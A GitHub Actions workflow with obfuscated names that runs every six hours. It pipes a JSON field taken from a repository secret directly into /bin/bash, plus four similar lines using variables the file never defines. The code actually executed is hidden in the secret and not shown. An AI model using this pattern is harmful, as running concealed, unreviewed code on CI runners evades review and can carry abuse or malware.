name: kouyangzhou
on:
  workflow_dispatch:
  schedule:
    - cron: '7 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: kouyangzhou
        env:
          jujxv32: ${{ secrets.jujxv32 }}
        run: |
          echo $jujxv32 | jq -r .jrj07 | /bin/bash
          echo $l7252 | jq -r .jtz329 | /bin/bash
          echo $mvwv1626 | jq -r .jddtg63282 | /bin/bash
          echo $vxb700 | jq -r .aqi40 | /bin/bash
          echo $meqw901 | jq -r .d3 | /bin/bash

